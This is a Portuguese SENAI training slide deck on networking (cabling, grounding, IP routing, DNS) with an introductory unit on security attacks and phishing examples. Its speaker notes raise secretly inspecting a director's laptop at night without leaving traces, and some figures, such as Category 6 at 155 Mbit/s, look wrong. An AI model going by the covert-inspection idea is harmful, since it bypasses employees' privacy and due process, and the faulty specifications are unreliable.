62282591 senai-curso-avancado-redes

1.403 visualizações

Publicada em

0 comentários
2 gostaram
Estatísticas
Notas
  • Seja o primeiro a comentar

Sem downloads
Visualizações
Visualizações totais
1.403
No SlideShare
0
A partir de incorporações
0
Número de incorporações
2
Ações
Compartilhamentos
0
Downloads
38
Comentários
0
Gostaram
2
Incorporações 0
Nenhuma incorporação

Nenhuma nota no slide
  • Caso: Uma funcionária estava sendo caluniada através de emails sendo enviados por provedores externos. Esses emails tinham como remetente o próprio nome da funcionária@webmail.com, o que supostamente indicava que ela mesma enviava as mensagens.
    Problema: Essa funcionária não tinha um bom relacionamento com o restante da equipe, logo todos eram suspeitos da armação.
    Solução: Com nossas ferramentas e equipamentos fizemos uma pesquisa nas máquinas do departamento para identificar quem havia acessado o email funcionária@webmail.com.
    Resultado: Em 20 minutos conseguimos identificar quem havia acessado tal email e descobrimos o verdadeiro envolvido. Conseguimos recuperar desde a criação do email até as mensagens que haviam sido enviadas
  • Algumas empresas partem do princípio que seus profissionais são corretos em postura e ações, e que são qualificados e éticos.
    Essa pesquisa da PWC mostra que os maiores fraudadores estão em cargos de confiança.
    Como fazer para rastrear essas figuras dentre seus colaboradores?!
    Como pegar o notebook de um diretor da empresa para fazer “manutenção preventiva” durante a noite?!
    Como executar o trabalho sem que ocorram indicios de inspeção não autorizada?
  • Não adianta colocar um micro dentro de um cofre e deixar relatórios sensíveis em cima da mesa.
    Ressaltar Funcionários insatisfeitos e divulgação de senhas.
  • Enfatizar falta de conscientização dos usuários e dos executivos.
  • Security is not an "add-on" nor an option it is part of the "intelligent information network DNA". Like security is built into cars these days, it is integrated to allow you to focus on what you have bought a car for and not on securing the car…. Imagine you would need to look for an airbag vendor, an ABS supplier and think how to integrate these components… Yes, that would be a nightmare and many unsecured cars would be driven on our streets hence putting at higher risk all drivers. We don't want to offer network nor security that way, it must be integrated and part of a comprehensive system!
    create explicit trust between the secured endpoints and the secured infrastructure
    build a systems-based infrastructure with pervasive security all throughout all network's layers
    to offer a less complex and more secure environment to optimize business apps and processes
  • 62282591 senai-curso-avancado-redes

    1. 1. 1 REDES AVANÇADAS Eudes Danilo Mendonça 12/09/2009 eudesdanilo@gmail.com http://www.4shared.com/file/59507480/8e48421c/ SENAI_-_CURSO_AVANCADO_REDES.html
    2. 2. Pré-requisitos: ¨ Conhecimentos básicos em redes ¨ Quem sou eu? ¨ Quem são vocês? ¨ O que esperam da matéria? ¨ Quais as experiências em Redes? ¨ Conhecimentos em Windows Server e/ou Linux? 2 Apresentação
    3. 3. Sinopse: I - Revisão dos Conhecimentos Básicos de Redes: Conceitos de Redes, equipamentos, periféricos e conexão da rede II - Noções de Cabeamento Estruturado: Conhecimento de Asbuilt, certificação de uma rede, elaboração de um anteprojeto de rede, elaboração de um projeto de redes. III - Noção de Protocolo de Rede : Conhecimento da camada OSI, estudo do protocolo TCP/IP, subnet de rede, roteamento de rede IV - Redes Ponto-a-Ponto Projeto; V - Segurança de Rede: Noções de segurança física e lógica, objetivos, introdução a ataques, vulnerabilidade, como previnir ataques VI - Windows 2003 Server: Instalação, configuração de serviços (DHCP, DNS, WINS, IIS, FTP), servidor de arquivos, servidor de Impressão, Active Direct, Segurança em nível de recursos - Permissões de arquivos, Backup e Recuperação, Logs e Serviços, Monitoramento físico e lógico da rede VII – Linux: Instalação, configuração de serviços (DHCP, FTP, APACHE, SSH), Segurança em nível de Recursos - Permissões de arquivos, Backup e Recuperação, Logs, Serviços, acessos apartir de estações Windows e Transmissão de arquivos entre windows e linux VIII - Ambiente Misto: Integração de serviços (WEB, FTP, BACKUP) entre a plataforma Windows 2003 e Linux com os clientes Windows XP 3
    4. 4. Plano de Aula: Utilização de Notebook e datashow e prática nos desktops de vocês; Serão avaliações Mensais: 4 Avaliação:
    5. 5. Materiais do curso e outros do autor ¨ Senai - Apostila http://www.4shared.com/file/51511261/48a51bbd/CURSO_TCNICO_EM_INFORMTICA_-_SENAI_- _TURMA_AVANCADA.html - Redes Avançadas Power Point http://www.4shared.com/file/59507480/8e48421c/SENAI_CURSO_AVANCADO_REDES.html - Redes Básicas – Power Point http://www.4shared.com/file/72507083/506ae8fd/SENAI_-_CURSO_BASICO_DE_REDES.html ¨ Esamaz Segurança de Sistemas http://www.4shared.com/file/39802306/e79291cf/Segurana_de_sistema.html Firewall http://www.4shared.com/file/40014575/5e5292cb/Firewall.html Script Linux http://www.4shared.com/file/42267953/f6df6fc4/SCRIPT_LINUX.html Vírus http://www.4shared.com/file /42802741/12513457/virus.html Criptografia http://www.4shared.com/file/43349581/53517583/Criptografia.html Segurança de Redes http://www.4shared.com/file/54429137/c5875aa9/Seguranca_em_Redes_de_Computadores.html 5
    6. 6. Dúvidas ?? 6
    7. 7. I – Revisão dos Conhecimentos Básico de Redes 7
    8. 8. O que é Redes de computadores? • Possibilitar o compartilhamento de informações (programas e dados) armazenadas nos computadores da rede; • Permitir o compartilhamento de recursos associados às máquinas interligadas; • Permitir a troca de informações entre os computadores interligados; • Permitir a troca de informações entre usuários dos computadores interligados; • Possibilitar a utilização de computadores localizados remotamente; • Permitir o gerenciamento centralizado de recursos e dados; • Melhorar a segurança de dados e recursos compartilhados 8
    9. 9. Porque ligar micros em rede? ¨Palavra chave “Compartilhamento”. 9
    10. 10. Tipos de Redes • Usada em redes pequenas (normalmente até 10 micros); • Baixo Custo; • Fácil implementação; • Baixa segurança; • Sistema simples de cabeamento; • Micros funcionam normalmente sem estarem conectados a rede; • Micros instalados em um mesmo ambiente de trabalho; • Não existe um administrador de rede; • Não existe micros servidores; • A rede terá problemas para crescer de tamanho. 10 Ponto x Ponto
    11. 11. Cliente x Servidor ¨ Deseja ter uma maior segurança na rede. (Nesse tipo de rede aparece uma figura denominada servidor. O servidor é um computador que oferece recursos especializados, para os demais micros da rede, ao contrário do que acontece com a rede ponto-a-ponto onde os computadores compartilham arquivos entre si e também podem estar fazendo um outro processamento em conjunto). ¨ Outra vantagem das redes cliente/servidor é a forma centralizada de administração e configuração, o que melhora a segurança e organização da rede. 11
    12. 12. Tipos de Servidores ¨ Servidor de Arquivos: É um servidor responsável pelo armazenamento de arquivos de dados – como arquivos de texto, planilhas eletrônicas, etc... É importante saber que esse servidor só é responsável por entregar os dados ao usuário solicitante (cliente), nenhum processamento ocorre nesse servidor, os programas responsáveis pelo processamento dos dados dos arquivos deve estar instalados nos computadores clientes. ¨ Servidor de Impressão: É um servidor responsável por processar os pedidos de impressão solicitados pelos micros da rede e enviá-los para as impressoras disponíveis. Fica a cargo do servidor fazer o gerenciamento das impressões. ¨ Servidor de Aplicações: É responsável por executar aplicações do tipo cliente/servidor como, por exemplo, um banco de dados. Ao contrário do servidor de arquivos, esse tipo de servidor faz processamento de informações. ¨ Servidor de Correio Eletrônico: Responsável pelo processamento e pela entrega de mensagens eletrônicas. Se for um e-mail destinado a uma pessoa fora da rede, este deverá ser passado ao servidor de comunicação (firewall) ¨ Servidor de Comunicação (Firewall): Usado para comunicação da sua rede com outras redes, como a Internete Se você acessa a Internet através de uma linha telefônica convencional, o servidor de comunicação pode ser um computador com uma placa de modem ou conexões com ADSL ou LPCD. 12
    13. 13. Vantagens e Desvantagem do Cliente x Servidor ¨ Custo Maior desempenho do que as redes ponto-a-ponto; ¨ Implementação necessita de especialistas; ¨ Melhor desempenho que as redes ponto-a-ponto; ¨ Alta segurança; ¨ Configuração e manutenção na rede é feita de forma centralizada; ¨ Existência de servidores, que são micros capazes de oferecer recursos aos demais micros da rede 13
    14. 14. II - Noções de Cabeamento Estruturado 14
    15. 15. Cabeamento Estruturado ¨Conector RJ45 Macho 15
    16. 16. Cabeamento Estruturado ¨ Cabo UTP ¨ UTP Color Codes Par 1 Branco-Azul (BA) / Azul (A) Par 2 Branco-Laranja (BL) / Laranja (L) Par 3 Branco-Verde (BV) / Verde (V) Par 4 Branco-Marrom (BM) / Marrom (M) 16
    17. 17. Cabeamento Estruturado Cabo UTP / CATEGORIAS ¨ Categoria 1 – cabo de par trançado tradicional, que é o utilizado para telefonia (instalado antes de 1983). Não é recomendado para utilização em redes locais. ¨ Categoria 2 – cabo certificado para transmissão de dados (possui 4 pares trançados). Sua utilização em redes também não é recomendável. ¨ Categoria 3 – esta categoria suporta 10 Mbit/sec numa rede Ethernet, 4Mbit/s em uma Token Ring. Este cabo permite que até quatro telefones normais ou dois multilinhas sejam conectados ao equipamento da companhia telefônica. ¨ Categoria 4 – esta categoria suporta taxas de transmissão de até 16 Mbit/s em uma rede Token Ring. Este cabo possui quatro pares. ¨ Categoria 5 – possui 4 pares trançados com oito torções. Suporta taxas de transmissão de 100 Mbit/s. Sua utilização é adequada para redes Fast Ethernet e redes ATM. No início dos anos 90, 60% dos edifícios possuíam este tipo de cabo (EUA). ¨ Categoria 6 – também possui 4 pares trançados. Suporta taxas de transmissão de até 155 Mbit/s. Sua utilização é adequada a redes Fast Ethernet para transmissão de dados e voz. 17
    18. 18. Cabeamento Estruturado ¨Crimpador ¨Testador 18
    19. 19. Cabeamento Estruturado ¨Delay É um dos itens mais importantes, pois a estruturação física pode influenciar na performance e velocidade da rede. É ideal que tenha o menor número de segmentação e quando ocorrer a segmentação que seja centralizado os servidores, pontos de saída da rede e principais clientes no switch principal. 19
    20. 20. Cabeamento Estruturado ¨Processo da Crimpagem Normal - Padronização EIA/TIA 568ª – Conhecida como “seqüência de crimpagem de normal”. Utilizada para conexão de um microcomputador a um HUB ou SWITCH. 20 EIA/TIA-568ª 1. Branco-Verde 2. Verde 3. Branco-Laranja 4. Azul 5. Branco-Azul 6. Laranja 7. Branco-Marrom 8. Marrom
    21. 21. Cabeamento Estruturado ¨Crossover - Um cabo crossover consiste na interligação de 2 (dois) computadores pelas respectivas placas de rede sem ser necessário a utilização de um concentrador (Hub ou Switch) ou a ligação de modems a CABO com a maquina cliente com conectores do tipo RJ45. A alteração dos padrões das pinagens dos cabos torna possível a configuração de cabo crossover ou cabo direto. A ligação é feita com um cabo de par trançado (na maioria das vezes) onde se tem: em uma ponta o padrão T568A, e, em outra o padrão T568B (utilizado também com modems ADSL). 21 1ª ponta do cabo branco verde verde branco laranja azul branco azul laranja branco marrom marrom 2ª ponta do cabo branco laranja laranja branco verde azul branco azul verde branco marrom marrom
    22. 22. Cabeamento Estruturado ¨1ª Prática: Processo da Crimpagem 22
    23. 23. Cabo Normal 23
    24. 24. Cabo Crowwover 24
    25. 25. Cabeamento Estruturado ¨Certo ¨Errado 25
    26. 26. Cabeamento Estruturado ¨O que não pode ocorrer 26
    27. 27. Cabeamento Estruturado ¨O que não pode ocorrer 27
    28. 28. Cabeamento Estruturado 28
    29. 29. Cabeamento Estruturado 29
    30. 30. Cabeamento Estruturado 30
    31. 31. Cabeamento Estruturado 31 2ª Prática: Processo da Crimpagem
    32. 32. Cabeamento Estruturado 32
    33. 33. Cabeamento Estruturado 33
    34. 34. Cabeamento Estruturado 34
    35. 35. Cabeamento Estruturado 35
    36. 36. Cabeamento Estruturado 36
    37. 37. Sugestão para a Rede Elétrica ¨Ideal ter a cada circuito de 10 A até 3 tomadas; ¨Não permitir que sejam ligados outros equipamentos como: Copiadoras, ventiladores, motores elétricos, ou qualquer outro que exija ou produza ruído na linha. 37
    38. 38. Sugestão para a Rede Elétrica 38
    39. 39. Sugestão para a Rede Elétrica ¨As tomadas devem ser do tipo universal de três pinos (tripolares) e a ligação fase/neutro/terra ¨ As tensões aproximadas na rede elétrica deverão ser as seguintes: Entre terra e fase = 117 V Entre neutro e fase = 115 V Entre terra e neutro = 2,5 V(valor Maximo tolerado) 39
    40. 40. Sugestão para a Rede Elétrica 40
    41. 41. Aterramento ¨ O terra dos equipamentos de informática DEVE ser totalmente independente dos demais terras existentes. ¨ Observando o seguinte na instalação: Ser construído á distância mínima de 2,40m dos outros terras do quadro e do neutro e a uma distância mínima de 25,00 do terra de pára-raios. O cabo que liga as barras de aterramento ao quadro deve ser encapado, possuir bitola compatível com a distancia entre o sistema e o quadro, e NÃO DEVERÁ ESTAR NUNCA CONECTADO AO NEUTRO.Não são aconselháveis distâncias maiores que 50m entre o terra e o quadro de distribuição. 41
    42. 42. Aterramento ¨ Material necessário para um aterramento simples: - 3 barras de cobre, com 2 a 3 metros de comprimento e 15cm de diâmetro. - 6 abraçadeiras de bronze para as barras de cobre. - 10 metros de fio isolado, de bitola idêntica á dos fios fase e neutro. - Sal grosso, carvão vegetal e enxofre em quantidades suficientes para cobrir o poço dos eletrodos. - Água destilada suficiente para regar a mistura. - As barras de cobre são chamadas eletrodos de aterramento; dão uma referência de terra de 0 volte uma conexão á terra para descargas elétricas atmosféricas. Também fornecem uma trajetória de impedância baixa á terra ( valor máximo de 25 ohms). 42
    43. 43. Aterramento 43
    44. 44. Aterramento ¨ Consequências da falta de aterramento: - Aparição de BAD CLUSTERS no HD ou até mesmo a perda total. Isto não demora a acontecer. - Você poderá perder seu HD em 2 ou 3 meses. - Danos na placa mãe. - Danos na memória, que podem vir a causar perda repentina de dados e ou congelamento de todo o sistema. 44
    45. 45. DOCUMENTAR UMA REDE ¨Físicamente: - Asbuilt ¨Lógicamente: - Software Inventário; (http://www.softwarepublico.gov.br/spb/ver-comunidade? community_id=3585) - Help Desk; (http://ocomonphp.sourceforge.net/) - Analyzer Network; (Network supervisor – 3COM) - Logs (Firewall, event view, /var/log/messages) 45
    46. 46. Criação de AnteProjeto de Rede ¨Veja quando falamos em projeto, não queremos e não vamos formar engenheiros aqui, nossa intenção e mostrar que uma documentação bem feita pode ser o diferencial dentro desta área , o projeto pode ser escrito, não necessariamente um desenho, lógico que se possuir o desenho é muito melhor, mesmo porque hoje existem ferramentas para auxiliar neste propósito. 46
    47. 47. Criação de AnteProjeto de Rede 47
    48. 48. Elaboração de um Projeto de Rede 48 ¨ Informações repassada pelo empresa: - 1 Caso: Rede 100 % cabeada; - 2 Caso: Rede Mista ¨ Criação da Documentação do Projeto: - Crianção do Site Survey; - Criação do anteprojeto; - Entrega do Asbuilt pela empresa prestadora do serviço;
    49. 49. Criação dos Site Survey – 1 Caso 49
    50. 50. Criação dos Site Survey – 2 Caso 50
    51. 51. Visão Macro
    52. 52. Exercício: Criação de anteprojeto 52 ¨ Informações repassada pelo empresa (Site Survey): - As paredes externas são de cerâmico aparente e as paredes internas, incluindo as salas laterais , de reboco liso e pintado; - O teto é de forro falso e o piso é de granito natural; - O departamento de telemarketing possui divisórias baixas acústicas em formas de “baias”, de madeira, revestida com espuma de poliuretano e tecido grosso; - Toda iluminação é feita com luminárias com 4 lâmpadas fluorescentes de 40 W x 220 V e localizada no centro geométrico de cada ambiente; - Altura entre o forro e o piso é de 2,6m; - A sala de treinamento, recebe freqüentemente pessoas não ligadas a empresa, além disso seu layout é constantemente alterado;
    53. 53. Exercício: Criação de anteprojeto 53
    54. 54. 54 III – Noções de Protocolo de rede
    55. 55. Protocolos - Definição
    56. 56. 56
    57. 57. A Mensagem em Camadas Remetente Mensagem Escrita Envelope Agência -Você tem uma idéia e Destinatário deseja comunica-la a outra pessoa -Tem de escolher a forma de expressar essa idéia -Você decide como de uma forma apropriada -Enfim, de fato expõe sua idéia Rodovia/Malote Mensagem Escrita Envelope Agência
    58. 58. Protocolo TCP/IP
    59. 59. O que configurar ? ¨IP ¨MASCARA ¨GATEWAY ¨DNS 59
    60. 60. Onde, o que e por que Configurar
    61. 61. IP e MASCARA 61
    62. 62. Endereços IP ¨Endereço IP: Indentificador de Rede + Indentificador de HOST 62 Endereço IP de 32 bits Identificador da rede Identificador do host REDE internet REDE REDE REDE hosts com o mesmo identificador de rede. host hosts com identificadores de rede distintos.
    63. 63. 63 Como atribuir IP’s para rede abaixo? SÃO PAULO CURITIBA ... ... 230 computadores 200 computadores
    64. 64. 64 endereço classe C MÁSCARA: 255.255.255.0 identificador de rede identificador do host 200.0.0.3 200.0.0.4 200.0.0.5 roteador 200.0.0.2 200.0.0.1 200.0.1.1 200.0.1.2 200.0.1.3 200.0.1.4 200.0.1.5 O roteador possui dois endereços IP, um para cada rede.
    65. 65. 65 Como Atribuir IP’s para rede abaixo? SÃO PAULO CURITIBA ... ... 400 computadores 600 computadores ... 500 computadores RIO DE JANEIRO
    66. 66. Solucionar Principais Problemas ¨ Usando o Utilitário IPConfig O utilitário IPConfig é muito útil para determinar se as configurações de rede atuais são desejadas. Vários erros podem ser detectados através deste utilitário. Execute-o através de um Prompt de Comando (clique em Start -> Run e digite CMD), digitando ipconfig /all e teclando Enter.
    67. 67. Solucionar Principais Problemas ¨ Conflito de IP: Ocorre quando um IP manual é atribuído à máquina e já existe outro computador na rede com o mesmo IP. Nesse caso, a tela do Ipconfig deve se parecer com a seguinte: ¨ Note que os campos IP e Máscara de Subrede estão zerados. Essa é a principal característica de um conflito de IPs. - Configuração incompleta: Certifique-se de que os campos DNS Servers e Default Gateway não estão em branco.
    68. 68. Solucionar Principais Problemas ¨ Note que, como não há servidor DNS e nem Default Gateway configurados, o computador somente poderá enviar e receber dados dentro da rede local e com outros computadores
    69. 69. Solucionar Principais Problemas ¨Usando o Utilitário PING Ela se refere ao utilitário do TCP/IP denominado "Ping", que tem como função testar se um host está ativo, enviando um pacote de dados para esse host e pedindo uma reposta caso ele esteja online e funcionando corretamente. Então, "pingar" o endereço de loopback simplesmente testa se sua máquina inicializou o TCP/IP corretamente. Para fazer isso, entre em um Prompt de Comando e digite: ping 127.0.0.1 e tecle Enter. Você também poderá pingar no IP da placa assim como de qualquer máquina da rede, assim como por nome dependendo de alguns serviços. Vale ser ressalta que o ping pode ser desabilitado.
    70. 70. Solucionar Principais Problemas ¨ Usando o Utilitário NETSTAT e TELNET NETSTAT – verifica os serviços que localmente a máquina/host está provendo TELNET: Tem como função testar se o serviço está ativo. Para fazer isso, entre em um Prompt de Comando e digite: telnet IP PORTA_SERVICO. Este Teste serve tanto se você local ou remoto da máquina que está provendo o serviço.
    71. 71. GATEWAY 71
    72. 72. Roteamento Indireto ¨Origem e Destino estão em redes diferentes 10.35.143.10 10.35.144.15 REDE 10.35.143.0 Tabela de Roteamento Destino Gateway 10.35.143.0 DIRETO 0.0.0.0 10.35.143.1 10.35.143.1 10.35.144.1 Router REDE 10.35.144.0 Tabela de Roteamento Destino Gateway 10.35.143.0 10.35.143.1 10.35.144.0 10.35.144.1 ....... ....... Tabela de Roteamento Destino Gateway 10.35.144.0 DIRETO 0.0.0.0 10.35.144.1
    73. 73. Exemplo de roteamento Exemplo de uma rede Intranet constituída de duas redes físicas conectadas por um roteador. 192.168.0.1 192.168.0.2 192.168.0.3 192.168.0.4 192.168.0.5 192.168.1.5 roteador interno rede 192.168.0.x rede 192.168.1.x servidor 192.168.1.1 192.168.1.2 192.168.1.3 192.168.1.4 rede interna de uma empresa.
    74. 74. Tabelas de Roteamento
    75. 75. Exemplo de Tabela de Roteamento TABELA DO ROTEADOR 1: Rede Gateway Interface 200.134.51.0 (255.255.255.0) 200.134.51.1 200.134.51.1 200.17.98.0 (255.255.255.0) 200.17.98.23 200.17.98.23 0.0.0.0 (0.0.0.0) 200.130.0.2 200.130.0.1 75 200.17.98.23 roteador 1 INTERNET roteador 2 REDE 200.17.98.X REDE 200.134.51.X 200.130.0.1 200.130.0.2 200.134.51.1
    76. 76. Exercício 1 ¨ Construa a tabela de roteamento do Roteador 1 76 200.17.98.0 200.0.0.1 200.0.0.2 200.17.98.23 INTERNET 1 255.255.255.0 200.134.51.0 255.255.255.0 200.17.98.1 200.134.51.1 INTERNET 3 2
    77. 77. 77 TABELA DE ROTEAMENTO Rede Destino Mascara Gateway Interface Custo
    78. 78. TABELA DE ROTEAMENTO Rede Destino Mascara Gateway Interface Custo 200.134.51.0 255.255.255.0 200.134.51.1 200.134.51.1 1 200.17.98.0 255.255.255.0 200.17.98.1 200.17.98.1 1 0.0.0.0 0.0.0.0 200.0.0.1 200.0.0.2 1 0.0.0.0 0.0.0.0 200.17.98.23 200.17.98.1 2
    79. 79. 79 Exercício 2: ¨ Utilizando a classe C: 200.0.0.0 (255.255.255.0) – A) distribua os IP’s nas duas redes abaixo – B) defina a tabela de roteamento do roteador 1. 1 2 INTERNET 100 computadores 100 computadores
    80. 80. DNS 80
    81. 81. DNS - Domain Name Service ¨Padrão Aberto para Resolução de Nomes Hierárquicos – Agrupa nomes em domínios. – A árvore de nomes é armazenada num banco ddee ddaaddooss ddiissttrriibbuuííddoo. ¨Especificações do DNS – RFCs 1033, 1034, 1034, 1101, 1123, 1183 e 1536. • Expecificações da Internet Task Force – Berkeley Internet Name Domain (BIND) • Implementação desenvolvida na Berkley University para a versão 4.3 SD Unix
    82. 82. S Demonstrações: Seerrvviiççooss ddee NNoommeess A função principal dos serviços de nomes é traduzir nomes de domínio para os seus respectivos endereços IP’s. wwwwww..coai.dceo.cmo m= 1=0 3.15.03.51.02..180 wwwwww.c.aodi.ec.ocmom wwwwww..auvfg.c.bomr = =5 02.07.52.09.62.08.80 wwwwww..auvfg.c.borm SSeerrvviiddoorr DDNNSS
    83. 83. 83 IV – Redes Ponto a Ponto
    84. 84. Elaboração de Projeto 84
    85. 85. Elaboração de Projeto ¨Criar uma formulário / checklist de informações que deverão que serão coletadas junto a conversa inicial. 85 Qual a finalidade ? Quem vai acessar (de onde, como, que solução) ? Quantos computadores ? De onde vai ser o acesso ? Q o s ? Local Físico (disponibilidade para cabeamento)
    86. 86. Elaborar uma proposta / Solução. ¨ Itens informados: - 2 casas (distante 500 mts) sendo que uma é tombada pelo patrimônio histórico; - Acesso de usuário em uma rede local e clientes via Web (internet); - Acesso de funcionários a pastas específicas de arquivos, assim como acesso ao sistema corporativo; - 500 computares (300 comp. Em uma casa e 200 em outra); - Não posso para meu acesso nem por 1 minuto 86
    87. 87. Ilustração do funcionamento do TCP/IP ¨Vídeo “Guerreiros da Internet”
    88. 88. 88 V - Segurança de Redes
    89. 89. 89 O sistema informático mais seguro não é utilizável O sistema informático mais utilizável é inseguro Só existe um computador 100% seguro, o desligado.
    90. 90. 90 Introdução ¨ A Segurança da Informação pode ser definida como a proteção de dados contra a revelação acidental ou intencional a pessoas não autorizadas, e contra alterações não permitidas. ¨ A segurança no universo computacional divide-se em: – Segurança Física – Segurança Lógica
    91. 91. 91 Introdução (cont.) ¨Objetivo da Segurança Informática – Seja qual for a dimensão de um sistema informático, deve procurar-se atingir, na sua exploração, os seguintes objetivos: • Integridade do equipamento • Confidencialidade e a qualidade da informação • Prontidão do sistema (eficiência x eficácia)
    92. 92. O que você está tentando proteger? ¨Seus dados Integridade Privacidade Disponibilidade ¨Seus recursos ¨Sua reputação 92
    93. 93. Contra o que você está tentando se proteger? ¨Roubo de senhas ¨Engenharia Social ¨BUG & Backdoors ¨Falha de autenticação ¨Falha de protocolo ¨Obtendo Informações ¨Negando serviços (DoS) 93
    94. 94. 94 Objetivos da Segurança ¨ O objetivo da segurança da informação abrange desde uma fechadura na porta da sala de computadores até o uso de técnicas criptográficas sofisticadas e códigos de autorização . ¨ O estudo não abrange somente o crime computacional (hackers), envolve qualquer tipo de violação da segurança, como erros em processamento ou códigos de programação .
    95. 95. Objetivos da Segurança “Segurança não é uma tecnologia” Quem? O que? Quando? Como? Onde? Porque?
    96. 96. 96 Objetivos da Segurança ¨A segurança de dados tem por objetivo restringir o uso de informações (softwares e dados armazenados) no computador e dispositivos de armazenamento associados a indivíduos selecionados.
    97. 97. Os objetivos da Segurança da Informação são: ¨Preservação do patrimônio da empresa (os dados e as informações fazem parte do patrimônio ). – Deve-se preservá-lo protegendo-o contra revelações acidentais, erros operacionais e contra as infiltrações que podem ser de dois tipos: 97 • Ataques passivos (interceptação) • Ataques ativos (interrupção, modificação e Fabricação)
    98. 98. Ataques passivos AAtataqquueess P Paassssivivooss Intercepção Análise do conteúdo das mensagens Análise do tráfego O objetivo é obter informação que está a ser transmitida. Este tipo de ataques é muito difícil de detectar. O esforço de protecção deve ser no sentido da prevenção.
    99. 99. Ataques Passivos ¨ Análise do conteúdo das mensagens – Escutar e entender as informações. ¨ Análise do tráfego – O oponente pode determinar a origem e identidade das comunicações e pode observar a frequência e comprimento das mesmas. Esta informação pode ser útil para determinar a natureza da comunicação. Os ataques passivos são muito difíceis de detectar porque não envolvem nenhuma alteração de dados. A ênfase ou o esforço deve desenvolvido no sentido da prevenção e não da detecção.
    100. 100. Emissor Receptor Intercepção Intercepção Intercepção – Quando utilizadores não autorizados conseguem aceder a recursos para os quais não estavam autorizados. É um ataque à confidencialidade. A parte não autorizada pode ser uma pessoa, um programa ou um computador. Exemplos: violação de cabos de comunicação, para capturar dados da rede, cópia ilícita de pastas e programas, etc.
    101. 101. AAtataqquueess A Atitvivooss Interrupção (Disponibilidade) Modificação (Integridade) Fabricação (Autenticidade) Ataques Ativos ¨ Envolvem alguma modificação de dados. ¨ Este tipo de ataques é muito difícil de prever, já que, para isso, seria necessário uma proteção completa de todos os tipos de comunicações e de canais. Por esta razão, o esforço de protecção deve ser no sentido de os detectar e recuperar dos atrasos ou estragos entretanto causados.
    102. 102. Interrupção Emissor Receptor Interrupção Interrupção – A informação de um sistema torna-se indisponível ou é destruída. É um ataque à disponibilidade. Exemplos: Destruição de peças de Hardware, o corte de linhas de comunicação, a inoperância do sistema de ficheiros, etc.
    103. 103. Modificação Emissor Receptor Modificação Modificação – uma parte não autorizada, não só acede à informação, mas também a modifica. É um ataque de integridade. Exemplos: alteração de valores num ficheiro de dados; alteração de um programa para que ele funcione de maneira diferente ou modificação do conteúdo de mensagens transmitidas pela rede.
    104. 104. Emissor Receptor Fabricação Fabricação Fabricação – uma parte não autorizada insere dados falsos no sistema. É um ataque à autenticidade. Exemplos: inserção de mensagens simuladas na rede ou a adição de registos a um ficheiro.
    105. 105. 105 O que é ataque? Ataque é toda ação realizada com intuito ou não de causar danos .
    106. 106. Vulnerabilidades ¨Todo computador é vulnerável a ataques. (Possui informação) • Tipos de Vulnerabilidades – Vulnerabilidades Físicas (Meio, Construção) – Vulnerabilidades Naturais (Desastres Naturais) – Vulnerabilidades de Hardware e Software(Falhas) – Vulnerabilidades de Media (Roubos de Media) – Vulnerabilidades de Comunicação (Hacker) – Vulnerabilidades de Humanos (Usuários) – Vulnerabilidades sobre Exploit (Brechas, Copias)
    107. 107. Um ataque típico 107
    108. 108. Anatomia de um ataque Varredura Reconhecimento Enumeração Invasão Escalando privilégios Acesso à informação Ocultação de rastros Negação de Serviços Instalação de back doors
    109. 109. 109
    110. 110. 110
    111. 111. O que um hacker ataca ? Aplicações Banco de dados Sistemas operacional Serviços de rede
    112. 112. 112 Tipos de ataques conhecidos • Escutas – Packet Sniffing – escuta e inspeciona cada pacote da rede – IP/Session Hijacking – interceptação da seção pelo invasor • Senha – Uso de dicionário de senhas – Força bruta – tentativa e erro • Outros ataques – Alteração de site (web defacement) – Engenharia social – Ataque físico às instalações da empresa – Uso de cavalos de tróia e códigos maliciosos – Trashing – revirar lixo em busca de informações – War dialing – liga para vários números de telefone para identificar os que tem modem instalado
    113. 113. 113 Motivação para o Ataque • Por quê existem as invasões aos sistemas? – Orgulho – Exibicionismo/fama – Busca de novos desafios – Curiosidade – Protesto – Roubo de informações – Dinheiro – Uso de recursos adicionais – Vantagem competitiva – Vingança
    114. 114. 114 Exemplo: Oliberal 10/02/08
    115. 115. Caso Real Atualmente 70% das quebras de segurança corporativas são geradas internamente.
    116. 116. Caso Real Perfil do Fraudador*: • 68% estão na Média e Alta Gerências • 80% tem curso superior completo • Predominantemente do Sexo Masculino • Idade média entre 31 e 40 anos *Pesquisa sobre crimes econômicos - PWC 05
    117. 117. 117 Tipos de ataques conhecidos • Negação de serviços – Syn Flood – inundar a fila de SYN para negar novas conexões – Buffer overflow – colocar mais informações do que cabe no buffer – Distributed DoS (DDoS) – ataque em massa de negação de serviços – Ping of Death – envio de pacote com mais de 65507 bytes – Smurf – envio de pacote ICMP em broadcast a partir de uma máquina, sendo inundada com as respostas recebidas – CGI exploit – Land, syn flooding, ... • Simulação – IP Spoofing – uso do IP de uma máquina para acessar outra – DNS Spoofing – assumir o DNS de outro sistema • Investigação – Port scanning – varredura de portas para tentar se conectar e invadir • Spam – Acesso a um grande número de pessoas, via email, com link para sites clonados que pedem informações pessoais
    118. 118. Ex: Email para roubo de informações 118
    119. 119. Ex: Email para roubo de informações 119
    120. 120. Ex: Email para roubo de informações 120
    121. 121. Ex: Email para roubo de informações 121
    122. 122. Ex: Email para roubo de informações 122
    123. 123. Ex: Email para roubo de informações 123
    124. 124. Ex: Email para roubo de informações 124
    125. 125. Ex2: Clonagem de cartão de banco 125 Bocal preparado
    126. 126. Ex2: Clonagem de cartão de banco 126 Imperceptível para o cliente
    127. 127. Ex2: Clonagem de cartão de banco Micro câmera disfarçada de porta panfleto
    128. 128. Ex2: Clonagem de cartão de banco 128 Visão completa da tela e teclas digitadas
    129. 129. Ex2: Clonagem de cartão de banco 129 Visão completa da tela e teclas digitadas
    130. 130. Ex2: Clonagem de cartão de banco 130 Micro câmera Bateria Antena transmissora
    131. 131. Ex3: Email de promoção (roubo informação) 131
    132. 132. Ex3: Email de promoção (roubo informação) 132
    133. 133. Ex4: Antivirus Gratis 133
    134. 134. Ex5: Engenharia Social ¨ Ao atender um telefonema, o interlocutor se identifica como vice-diretor da empresa. Você já o viu pelos corredores, mas nunca falou com ele por telefone. Ele informa que se encontra na filial da empresa, em reunião, e está com problemas para acessar o sistema. Assim sendo, solicita a senha para que possa ter acesso. Informa, ainda, que está acompanhado de 10 pessoas que possuem outros compromissos e que não podem esperar por muito tempo. 134
    135. 135. Ex6: Email Receita Federal 135
    136. 136. Cópia de identidade visual de órgãos públicos Pedido de download de arquivos / erros de português
    137. 137. Cópia de identidade visual de entidades populares História estranha e mal contada Necessidade urgente de download
    138. 138. Serviço inexistente Pedido de download de arquivos Ameaças
